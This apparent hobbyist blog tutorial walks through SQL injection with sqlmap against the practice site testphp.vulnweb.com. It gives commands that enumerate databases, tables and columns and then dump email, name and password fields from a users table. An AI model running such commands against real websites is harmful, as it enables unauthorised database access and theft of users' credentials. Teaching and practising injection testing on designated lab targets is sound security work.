Latest News
Loading...

Friday, 22 January 2016

08:51

Hacking Website with Sqlmap in Kali Linux

airdropsplanet  ,  No comments




First off, you will need two things
  1. Kali Linux
  2. SqlMap

You can get kali linux from here and for sqlmap follow these step
  1. Login in kali linux
  2. Then Applications
  3. Then Kali Linux
  4. Then Top 10 Security Tools
  5. Last SqlMap
To find if website can be hacked by sqlmap you must enter ' at the end of http://testphp.vulnweb.com/listproducts.php?cat=1    url.


So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump




MR: ADMIN

airdropsplanet

Hello! Its me ~Alpha.im currently learning tons of programming languages and expoilting pentesting etc. I will share all the tricks tips ebooks courses tutorials tools I know .
Related Posts

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

 

Copyright @ 2016 Elite Hackers.

Designed by Alpha